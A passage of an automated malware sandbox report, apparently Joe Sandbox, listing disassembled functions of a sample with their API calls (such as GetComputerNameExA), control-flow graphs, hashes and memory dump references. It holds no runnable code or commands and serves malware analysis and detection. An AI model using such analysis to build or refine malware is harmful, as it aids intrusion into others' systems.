                                                                                        • Opcode ID: a4a86d7b52cb3e14db97b2db7578f3efe0a8f0f8a5aefe0835618a64f114a3ca
                                                                                        • Instruction ID: f53fb591ea3304d65121c93595bf8a8239585c7db0c88596875c0d5a66c4cfbc
                                                                                        • Opcode Fuzzy Hash: a4a86d7b52cb3e14db97b2db7578f3efe0a8f0f8a5aefe0835618a64f114a3ca
                                                                                        • Instruction Fuzzy Hash: D83105B2A405019FD71DCF28CC627BE7BE2FB99310F69806DD252E7790DB38A9018704
                                                                                        Function 007B8640 Relevance: 1.7, APIs: 1, Instructions: 227COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ExitProcess.KERNEL32(00000000), ref: 007B88E8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExitProcess
                                                                                        • String ID:
                                                                                        • API String ID: 621844428-0
                                                                                        • Opcode ID: caefa875ca992832038e93bfe6407e32c4b141810255651ece52676ca7e1bb1d
                                                                                        • Instruction ID: cc76ee64793fa18f75cc5071508ecacda813e63abb0c7e4844629a6c1c041461
                                                                                        • Opcode Fuzzy Hash: caefa875ca992832038e93bfe6407e32c4b141810255651ece52676ca7e1bb1d
                                                                                        • Instruction Fuzzy Hash: C8613977B543094BD718AEACCC8639AB7C69B84310F1E853CA598DB392ED7C9C04D786
                                                                                        Function 007ED910 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LdrInitializeThunk.NTDLL(007F09B8,?,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 007ED93E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                        • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                        • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                        • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                                        Function 007EBCE0 Relevance: 1.5, Strings: 1, Instructions: 253COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID: yPC
                                                                                        • API String ID: 2994545307-621879255
                                                                                        • Opcode ID: 73404d408cfb2530c69f5fd7543a48a76e30338933f959677422eabbc76795cf
                                                                                        • Instruction ID: 9b70f5faec3cef39a2304a66eed0210d853b621c7763104f374c174eceaa0d0d
                                                                                        • Opcode Fuzzy Hash: 73404d408cfb2530c69f5fd7543a48a76e30338933f959677422eabbc76795cf
                                                                                        • Instruction Fuzzy Hash: C9617672A092549BD7249A26DC8177BBBA3EBC8310F2E843CD9855B346E6399C0187C1
                                                                                        Function 007EDCE9 Relevance: 1.4, Strings: 1, Instructions: 121COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: D]+\
                                                                                        • API String ID: 0-1174097187
                                                                                        • Opcode ID: cb1f40420c4832113f96a79a381cc981f6b709cf62ee3c904e0d25967a432112
                                                                                        • Instruction ID: 78cd87ca383f9d71a6125ae1c8c86148aa8c1f1ed2a447a3b2641d738238c677
                                                                                        • Opcode Fuzzy Hash: cb1f40420c4832113f96a79a381cc981f6b709cf62ee3c904e0d25967a432112
                                                                                        • Instruction Fuzzy Hash: 9A316BB47496908BE3188E92DCD073A739AF7DE300F28983DC5851B286C23C9C41C79B
                                                                                        Function 007E84F0 Relevance: .3, Instructions: 261COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: dc759e0255c5dffba4064865cc7b431a7c7f1d29af8a6f79436f3393c9c42ff1
                                                                                        • Instruction ID: 523d65d93bfcbad899911a2bd1b2ee2dc01c51346a147cea74500dd2884d66db
                                                                                        • Opcode Fuzzy Hash: dc759e0255c5dffba4064865cc7b431a7c7f1d29af8a6f79436f3393c9c42ff1
                                                                                        • Instruction Fuzzy Hash: 2AA1257210E3C48FD3448A2AC85436FBBD29BD9318F298A2DE4D957382DABDC945D707
                                                                                        Function 007C8DF1 Relevance: .2, Instructions: 238COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 62538c427c0e0a6c05c025d5e6a5664b40028c70a09a7b2cc852283b8c1a088e
                                                                                        • Instruction ID: 84e0dca83e27bfab6bdc8e40bcbd7b4fa931a64a4b18d19c166320901c799a27
                                                                                        • Opcode Fuzzy Hash: 62538c427c0e0a6c05c025d5e6a5664b40028c70a09a7b2cc852283b8c1a088e
                                                                                        • Instruction Fuzzy Hash: 66712872904310CBD724DF24DC92BBB73A2EF84364F08496DE9958B361D73DA901D752
                                                                                        Function 007EFB80 Relevance: .2, Instructions: 232COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 327e2e3e0ebfe257c3eba4047259758632b0d482afde82be114436991145ab5a
                                                                                        • Instruction ID: 24be4260425b493bc0406a1ea149f21242d3323206629db6a40a6b4299c3ea83
                                                                                        • Opcode Fuzzy Hash: 327e2e3e0ebfe257c3eba4047259758632b0d482afde82be114436991145ab5a
                                                                                        • Instruction Fuzzy Hash: A2614675B093819BDB149E19C891A3BB7A2EBD9310F29843CE485876A5EB34DC11C742
                                                                                        Function 007DB842 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 528 7db842-7db84c 529 7db84e-7db855 528->529 530 7db86b-7db8b6 FreeLibrary call 7ef450 528->530 531 7db860-7db869 529->531 536 7db8c0-7db8e5 530->536 531->530 531->531 536->536 537 7db8e7-7db8f1 536->537 538 7db90b-7db942 GetComputerNameExA 537->538 539 7db8f3-7db8fa 537->539 541 7db946 538->541 540 7db900-7db909 539->540 540->538 540->540 541->541
                                                                                        APIs
                                                                                        • FreeLibrary.KERNEL32(?), ref: 007DB875
                                                                                        • GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 007DB924
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID: ComputerFreeLibraryName
                                                                                        • String ID: KHGN
                                                                                        • API String ID: 2904949787-1032087821
                                                                                        • Opcode ID: 58e855109e179be23af8c9271a4954a62c6daf2bc6dfafaa1fecb0632d925e4a
                                                                                        • Instruction ID: 183d9faeb3c1ed68b1c1dc771b43263240288b31423b049bf890738c606e3918
                                                                                        • Opcode Fuzzy Hash: 58e855109e179be23af8c9271a4954a62c6daf2bc6dfafaa1fecb0632d925e4a
                                                                                        • Instruction Fuzzy Hash: 1421AE7010C3C58EDB218B359860BFB7FE4AB9B344F19485ED0C9D7292CB39444ADB52
                                                                                        Function 007DB840 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 542 7db840-7db8b6 FreeLibrary call 7ef450 547 7db8c0-7db8e5 542->547 547->547 548 7db8e7-7db8f1 547->548 549 7db90b-7db942 GetComputerNameExA 548->549 550 7db8f3-7db8fa 548->550 552 7db946 549->552 551 7db900-7db909 550->551 551->549 551->551 552->552
                                                                                        APIs
                                                                                        • FreeLibrary.KERNEL32(?), ref: 007DB875
                                                                                        • GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 007DB924
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID: ComputerFreeLibraryName
                                                                                        • String ID: KHGN
                                                                                        • API String ID: 2904949787-1032087821
                                                                                        • Opcode ID: 13ebbf1b6eff994f8fe0239c29f319df8e9ba0cc700b6f29c6f1d347ba24ba25
                                                                                        • Instruction ID: 44934fb6aee5447f59dda3d2a37595ad98597a64c8a571fdf7872e4f0f3b5901
                                                                                        • Opcode Fuzzy Hash: 13ebbf1b6eff994f8fe0239c29f319df8e9ba0cc700b6f29c6f1d347ba24ba25
                                                                                        • Instruction Fuzzy Hash: 6C11C1B0148385DFD7218B359861BFB7BE4AB8B344F15882DD0C9C3291CB394806DB52
                                                                                        Function 007DB94D Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 83COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 717 7db94d-7db957 718 7db959 717->718 719 7db96b-7db9a6 717->719 720 7db960-7db969 718->720 722 7db9b0-7db9fb 719->722 720->719 720->720 722->722 723 7db9fd-7dba07 722->723 724 7dba2d-7dba34 723->724 725 7dba09-7dba1f 723->725 727 7dba3b-7dba71 GetComputerNameExA 724->727 726 7dba20-7dba29 725->726 726->726 728 7dba2b 726->728 728->727
                                                                                        APIs
                                                                                        • GetComputerNameExA.KERNELBASE(00000005,11780A54,00000100), ref: 007DBA54
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID: ComputerName
                                                                                        • String ID: bC
                                                                                        • API String ID: 3545744682-4190571504
                                                                                        • Opcode ID: ced4810af47ec25f17d8333e54ff5b33ca18521fc8c558c06931839231328f3a
                                                                                        • Instruction ID: a6959eb00c951601ee55ce4cad0ef19d71f79a65539198d75f42668b22f01d72
                                                                                        • Opcode Fuzzy Hash: ced4810af47ec25f17d8333e54ff5b33ca18521fc8c558c06931839231328f3a
                                                                                        • Instruction Fuzzy Hash: 0921F1325093D1CAD7358F2584943BABBE1EFD6300F5A884EC8CA9B341CA785409CB52
                                                                                        Function 007DB948 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 76COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetComputerNameExA.KERNELBASE(00000005,11780A54,00000100), ref: 007DBA54
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID: ComputerName
                                                                                        • String ID: bC
                                                                                        • API String ID: 3545744682-4190571504
                                                                                        • Opcode ID: 5a65e95dbd8be97be3f38b3eefca164848b046388ca8b899dbe2a8cc65a50991
                                                                                        • Instruction ID: beda0689d95acc74feb2e771c704471f8c1f220be1945f2ae4078f5c6be912e9
                                                                                        • Opcode Fuzzy Hash: 5a65e95dbd8be97be3f38b3eefca164848b046388ca8b899dbe2a8cc65a50991
                                                                                        • Instruction Fuzzy Hash: F621CF36549391CBD7248F6084947BABBE2EFC5310F1A895EC9CA9B340CA785809CB92
                                                                                        Function 007DB7AD Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 007DB924
                                                                                        Strings
                                                                                        Memory Dump Source
